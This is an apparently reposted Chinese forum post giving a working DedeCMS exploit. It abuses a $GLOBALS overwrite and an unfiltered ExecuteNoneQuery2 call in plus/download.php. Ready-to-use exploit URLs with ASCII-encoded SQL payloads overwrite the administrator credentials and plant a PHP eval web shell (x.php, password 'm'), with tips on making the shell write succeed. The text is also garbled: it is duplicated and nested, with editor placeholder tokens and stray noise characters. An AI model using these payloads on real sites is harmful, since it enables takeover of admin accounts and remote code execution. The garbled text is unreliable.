|
|
此漏洞无视gpc转义,过80sec注入防御。
! ]& L) Y" W) g9 j" r补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
9 e- H9 h7 Z6 P* K起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。$ J% `9 B! o* q
include/dedesql.class.php
" h( T: H1 w+ B; [) uif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
. m. k3 o8 S, Y9 _. o* ~8 U同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
! f5 G! E7 b' ^( L" o. U而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
* ~' X+ ^2 W' X6 V( f5 v/ ^plus/download.php2 @, i. z! C* o$ {' {: f
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):) v# |. D: U( P! c) m: Q) X
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
, h6 z8 ?, o+ c) p! \4 ZUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:* G" R) B+ k0 u, Q
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
1 @3 a4 {; b9 Y, p1 \+ ?# B漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
2 |/ Q3 A/ y' b' t如果找不到后台,参见以前修改数据库直接拿SHELL的方法
, m, [6 o8 S7 p, R3 H% w9 XUPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
1 @( \! z! [4 I. d) N' a! H: K# S# ~( q补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
( o# ~$ A# ]$ `; {起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。7 _3 g6 `0 r. M0 ~# o* \
include/dedesql.class.php
: w9 G8 Z& G. N. p9 Y9 D: J9 n2 i) w, Wif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
: w) V D+ Z9 F! ^6 o, z& j% g同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
( f: i5 j" V) S3 x( M9 o7 F5 K而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。+ B7 d% V& R: Z* m3 C
plus/download.php( I* z v: s* C) v) O. Z, T
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
6 B( x8 H& ]4 Y0 G0 P% T) Hadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
! C: Q9 e$ Q+ }# C* m- H$ i" kUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:
T# C2 b0 E8 n, rhttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin6 _- h& y' h/ U( g& u9 q- ]0 m" H
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
% Z" y. S/ c% |$ j3 N% `4 M" N$ d如果找不到后台,参见以前修改数据库直接拿SHELL的方法' g# p; |$ {! T9 d4 r
___FCKpd___6getshell:* t& V) H: r; m* D& O# B" K
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m+ k6 j7 H$ i- E9 B5 l5 k( W
http://127.0.0.1/plus/x.php* z* M: f6 a5 a9 I7 u: }( V
update成功后还要访问下 /plus/mytag_js.php?aid=1. v, T5 G) T5 [- G
失败原因:8 F E& R3 q8 Z g7 M* o
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
: S: u7 ~! o5 Y* h配图:
' X0 q# o; k7 K; }1.查看dede当前版本8 @; z, D/ ~# I% o5 n" X$ c
: r8 x+ ]8 ^, }4 H/ y+ C3 M$ \2.执行exp
, M" r, l# [1 E
( T* p, q& Y# s' V% I! E i/ q0 thttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
' e1 Z8 u. U# {# z2 ^. S* c- A* m/ x% Y5 n* C8 U' ]" w4 M
spider密码admin
# h/ ^$ X& A/ o' [$ `' U5 H1 s3 A1 T g
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png& K' B3 P8 B; M* v5 v! i$ ]
原作者:imspider1 ^* R- E8 O9 z) _+ T
; m% p" `& w! P+ a$ j本博客测试+配图+getshell
( C: }; ]) R* }' g4 i3 Y9 rPOST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
3 G) E! X4 g* I( F5 L9 K
+ j; f, N' h3 M6 U; U5 x8 cgetshell:8 ?7 R8 U" d: g/ V/ B
___FCKpd___7会在plus目录生成 x.php 密码 m. x2 i9 }8 k( S& H& i! U
http://127.0.0.1/plus/x.php- Z+ n. S* x( E" U1 u* z0 l
update成功后还要访问下 /plus/mytag_js.php?aid=12 d) T( f5 Y0 }" S9 x8 r6 z' v k
失败原因:
3 u& ]! w; S* z. b2 Y8 v, Y测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)* ^( U& Z, A: W
配图:
4 h. A K, ~/ H8 R; u1.查看dede当前版本6 f+ ^1 I7 d. a q/ i
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png
9 P$ d* ]: g' ^) n* o! X2.执行exp
' ]1 d- B. O- o! v8 Q% hhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台8 y) u3 d$ h! a% Q9 w9 {
spider密码admin
( o! F, `4 G& f5 f# Xhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png {4 `; w0 I u2 ~( n- F
' r1 t" f5 L; D; W
|
|
发表于 2013-9-21 16:08:21
收藏
支持
反对